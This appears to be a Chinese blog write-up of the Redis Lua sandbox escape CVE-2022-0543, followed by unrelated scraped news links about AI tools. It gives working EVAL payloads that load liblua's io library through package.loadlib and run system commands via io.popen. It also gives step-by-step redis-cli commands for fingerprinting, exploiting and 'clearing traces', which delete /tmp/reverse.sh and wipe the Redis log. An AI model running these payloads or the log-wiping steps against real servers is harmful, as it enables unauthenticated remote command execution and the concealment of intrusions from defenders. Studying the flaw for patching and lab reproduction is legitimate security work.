Redis沙盒逃逸(CVE-2022-0543)
一.沙箱的含义沙箱是一种安全机制限制程序只能访问特定资源防止恶意操作影响系统。场景沙箱作用浏览器沙箱网页代码只能操作浏览器无法直接读写本地文件游戏沙箱外挂程序无法修改游戏内存Redis Lua 沙箱Lua 脚本无法执行系统命令、访问文件系统关系图物理机├── 容器 ADocker│ └── Redis 进程│ └── Lua 沙箱 ←── 你的漏洞在这层突破│ └── 恶意脚本理论上只能操作 Redis│└── 容器 B其他应用1.什么是redisRedis英文全称是Remote Dictionary Server远程字典服务是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库并提供多种语言的API。与MySQL数据库不同的是Redis的数据是存在内存中的。它的读写速度非常快每秒可以处理超过10万次读写操作。因此redis被广泛应用于缓存另外Redis也经常用来做分布式锁。除此之外Redis支持事务、持久化、LUA 脚本、LRU 驱动事件、多种集群方案。2.春秋这里可以进行ssrf跳转到baidu页面直接使用file://协议进行读取flag3.漏洞复现漏洞原理该漏洞的存在是因为Debian/Ubuntu中的Lua库是作为动态库提供的。自动填充了一个package变量该变量又允许访问任意 Lua 功能。我们借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linugnu/liblua5.1.so.0里的导出函数luaopen_io。在Lua中执行这个导出函数即可获得io库再使用其执行命令Redis 5.0.7 的 Lua 沙箱├── 禁用了 io/os 等危险库loadlib 被限制└── 但漏洞package.loadlib() 仍可加载外部动态库攻击路径package.loadlib() → 加载系统 liblua5.1.so → 导出 luaopen_io→ 获得 io.popen() → 执行任意系统命令复现payload:eval local io_l package.loadlib(/usr/lib/x86_64-linux-gnu/liblua5.1.so.0, luaopen_io); local io io_l(); local f io.popen(id, r); local res f:read(*a); f:close(); return res 0代码片段作用local io_l package.loadlib(/usr/lib/x86_64-linux-gnu/liblua5.1.so.0, luaopen_io)加载系统 Lua 库获取luaopen_io函数沙箱禁用的危险函数local io io_l()调用函数初始化 IO 模块获得io.popen等危险方法local f io.popen(id, r)执行系统命令id返回文件句柄local res f:read(*a)读取命令全部输出f:close()关闭文件句柄return res将结果返回给 Redis 客户端0声明脚本操作 0 个 Redis 键绕过键名检查修改红色部分就可以执行命令了eval local io_l package.loadlib(/usr/lib/x86_64-linux-gnu/liblua5.1.so.0, luaopen_io); local io io_l(); local f io.popen(whoami); local res f:read(*a); f:close(); return res 0关键风险点要素说明无需认证Redis 未设置密码或已认证远程 RCE网络可达即可执行系统命令服务权限通常以redis用户运行但可尝试提权隐蔽性利用 Lua 脚本不写入磁盘二.实战渗透1.信息收集# 确认目标存在且版本 vulnerable redis-cli -h 192.168.40.128 -p 6379 INFO server | grep redis_version # 期望5.0.7 或 5.0.6 等 5.0.8 的版本2.验证漏洞存在redis-cli -h 192.168.40.128 -p 6379 EVAL return test 0 # 确保 EVAL 命令可用Lua 引擎正常3.漏洞利用redis-cli -h 192.168.40.128 -p 6379 EVAL local io_l package.loadlib(/usr/lib/x86_64-linux-gnu/liblua5.1.so.0, luaopen_io); local io io_l(); local f io.popen(id, r); local res f:read(*a); f:close(); return res 04.清理痕迹# 删除临时文件 EVAL ... io.popen(rm -f /tmp/reverse.sh) ... 0 # 清空 Redis 日志如有权限 EVAL ... io.popen(echo /var/log/redis/redis-server.log 2/dev/null) ..

相关新闻

从聊天框到 Agent:Claude Code 真正的提效方式

从聊天框到 Agent:Claude Code 真正的提效方式

如此反复了四十分钟,最后我关掉 Claude Code,自己动手写,二十分钟搞定了。 这一刻我才真正理解 Claude Code 创始人 Boris Cherny 在斯坦福 CS146S 课上说的那句话——很多人把 Claude Code 用成了「纯聊天框」,看似提效&#xff…

2026/7/23 1:32:45阅读更多 →
OpenAI最新发布的GPT-4.1,学术性能远超DeepSeek V3,学术研究和写作的全新选择!

OpenAI最新发布的GPT-4.1,学术性能远超DeepSeek V3,学术研究和写作的全新选择!

各位同仁好,我是七哥。一个在高校里从事人工智能 相关领域研究,钻研用大模型AI实操的学术人。可以和七哥交流学术写作或Gemini、GPT、Claude 等大模型 学术实操相关问题,多多交流,相互成就,共同进步。 OpenAI发布了全新的非推理类AI大模型——GPT-4.1,同时推出了标准…

2026/7/23 1:32:45阅读更多 →
Gemini3.5 图片生成失败被拦截?解决方法

Gemini3.5 图片生成失败被拦截?解决方法

在大模型图像生成领域,Google 推出的 Gemini 3.5(基于 Imagen 3 绘图引擎)凭借高保真度和强大的文字渲染能力备受瞩目 。然而,许多开发者和设计师在实际体验中常常遇到“图片生成失败”、“由于安全政策被拦截”或提示“无法处理该…

2026/7/23 1:32:45阅读更多 →
AI实验室:智能科研工作流与虚拟实验环境解析

AI实验室:智能科研工作流与虚拟实验环境解析

1. 项目概述:AI实验室的诞生背景作为一名长期在科研一线工作的技术专家,我最近被Claude团队推出的"AI实验室"功能彻底改变了工作方式。这个看似简单的概念背后,实际上构建了一个完整的虚拟研究环境——它把传统实验室里那些昂贵的仪…

2026/7/23 2:40:57阅读更多 →
短文标题:动态扫描的秘密:用“快”骗过你的眼睛

短文标题:动态扫描的秘密:用“快”骗过你的眼睛

短文标题:动态扫描的秘密:用“快”骗过你的眼睛你有没有想过一个问题:4位数码管,如果每个数码管单独驱动,需要32个引脚。但实际电路中,只需要12个引脚——8个段线,4个位选线。少了的20个引脚去哪…

2026/7/23 2:40:57阅读更多 →
Unity 2D碰撞体自动生成:SmartShape2D原理、优化与实战指南

Unity 2D碰撞体自动生成:SmartShape2D原理、优化与实战指南

1. 项目概述:为什么我们需要自动生成碰撞体?在Unity里做2D游戏,尤其是那种地图元素复杂、角色动作丰富的项目,比如横版过关或者Roguelike,碰撞体(Collider)的设置绝对是个体力活,也是…

2026/7/23 2:40:56阅读更多 →
UE5武器系统设计:基于TSubclassOf与数据驱动架构实战

UE5武器系统设计:基于TSubclassOf与数据驱动架构实战

1. 项目概述:告别硬编码的武器系统设计在虚幻引擎5(UE5)里做游戏,尤其是涉及到战斗和装备系统时,武器管理绝对是个绕不开的核心模块。很多开发者,特别是从蓝图快速原型起步的朋友,很容易陷入一个…

2026/7/23 2:40:56阅读更多 →
ARM Cortex-M系统控制模块:时钟、电源与复位管理实战解析

ARM Cortex-M系统控制模块:时钟、电源与复位管理实战解析

1. 系统控制模块:微控制器的大脑与神经中枢在嵌入式开发领域,尤其是基于ARM Cortex-M内核的微控制器项目里,我们常常把注意力集中在具体的功能实现上,比如驱动一个LCD屏幕、读取ADC数据或者处理UART通信。然而,一个稳定…

2026/7/23 2:40:56阅读更多 →
Gemini 3.6 Flash / Gemini 3.5 Flash-Lite 模型能力解析 + OpenAI兼容调用实战

Gemini 3.6 Flash / Gemini 3.5 Flash-Lite 模型能力解析 + OpenAI兼容调用实战

前言 近期谷歌更新两款 Flash 系列轻量化多模态模型:gemini-3.6-flash、gemini-3.5-flash-lite。很多开发者做业务选型时很困惑:两款同系列模型怎么区分、分别适合什么业务?同时原生谷歌 API 网络环境调试麻烦,不少开发者会选择兼…

2026/7/23 2:38:56阅读更多 →
Go语言静态资源打包方案对比与实践指南

Go语言静态资源打包方案对比与实践指南

1. 项目背景与核心需求在Go语言开发中,我们经常需要处理静态资源文件的打包问题。无论是Web应用的模板文件、前端资源,还是配置文件、证书等,都需要随程序一起分发。传统做法是将这些文件与编译后的二进制文件放在同一目录下,但这…

2026/7/23 0:56:31阅读更多 →
Go语言实现高性能LDAP认证服务的架构与实践

Go语言实现高性能LDAP认证服务的架构与实践

1. 项目背景与核心价值LDAP(轻量级目录访问协议)作为企业级身份认证的黄金标准,已经服务了超过80%的财富500强公司。我在金融科技领域实施统一认证体系时,发现传统Java方案存在启动慢、内存占用高等痛点。而Go语言凭借其协程并发模…

2026/7/23 0:56:31阅读更多 →
【AI面试官实战指南】:用ChatGPT模拟10类高频技术岗面试,3天提升应答精准度92%

【AI面试官实战指南】:用ChatGPT模拟10类高频技术岗面试,3天提升应答精准度92%

更多请点击: https://intelliparadigm.com 第一章:AI面试官实战指南的核心价值与适用场景 AI面试官并非替代人类HR的“黑箱工具”,而是以可解释、可审计、可迭代的方式,赋能招聘全链路的关键基础设施。其核心价值在于将主观经验沉…

2026/7/23 0:56:31阅读更多 →
Chitchatter完整指南:免费开源的终极点对点安全聊天工具

Chitchatter完整指南:免费开源的终极点对点安全聊天工具

Chitchatter完整指南:免费开源的终极点对点安全聊天工具 【免费下载链接】chitchatter Secure peer-to-peer chat that is serverless, decentralized, and ephemeral 项目地址: https://gitcode.com/gh_mirrors/ch/chitchatter Chitchatter是一款革命性的安…

2026/7/23 0:00:28阅读更多 →
从单点好评到指数级传播:AI副业主理人必须掌握的4层口碑渗透模型(含ROI测算表)

从单点好评到指数级传播:AI副业主理人必须掌握的4层口碑渗透模型(含ROI测算表)

更多请点击: https://intelliparadigm.com 第一章:从单点好评到指数级传播:AI副业主理人必须掌握的4层口碑渗透模型(含ROI测算表) 当AI副业主理人不再仅满足于单次服务交付,而是主动构建可复用、可裂变、可…

2026/7/23 0:00:28阅读更多 →
油泥处理设备哪里能买到

油泥处理设备哪里能买到

油泥处理设备哪里有?这是许多从事油田、炼化、清罐业务的从业者最关心的问题。根据河南三丰环保设备有限公司的行业经验,选购油泥处理设备的核心在于设备能否适配当地环保法规与原料特性,而非单纯看价格。该公司总经理王钦田先生指出&#xf…

2026/7/23 0:00:28阅读更多 →
YOLOv8推理性能优化:从1.2FPS到35FPS的全链路加速实践

YOLOv8推理性能优化:从1.2FPS到35FPS的全链路加速实践

如果你在部署 YOLOv8 时,发现推理速度只有可怜的 1-2 FPS,而别人的演示视频却能跑到 30 FPS 以上,那么问题很可能不在模型本身,而在于你的整个处理链路。很多开发者拿到一个训练好的 YOLOv8 模型后,会直接使用官方示例…

2026/7/22 22:56:18阅读更多 →
Coze与Dify对比指南:低代码AI应用开发从入门到实战

Coze与Dify对比指南:低代码AI应用开发从入门到实战

1. 从零到一:为什么你需要了解 Coze 和 Dify?如果你对 AI 应用开发感兴趣,但一看到“大模型”、“智能体”、“工作流”这些词就头疼,觉得门槛太高,那这篇文章就是为你准备的。很多开发者,包括我自己&#…

2026/7/22 18:55:50阅读更多 →
AI生图工具怎么选?2026年6月版实测对比

AI生图工具怎么选?2026年6月版实测对比

做自媒体的朋友应该都有体会:配图一直是个让人头疼的问题。2026年,AI生图工具已经非常成熟了,但工具太多反而不知道怎么选。以下是截至2026年6月我对主流AI生图工具的实测对比。Midjourney V8.1:速度之王2026年6月11日&#xff0c…

2026/7/22 18:55:50阅读更多 →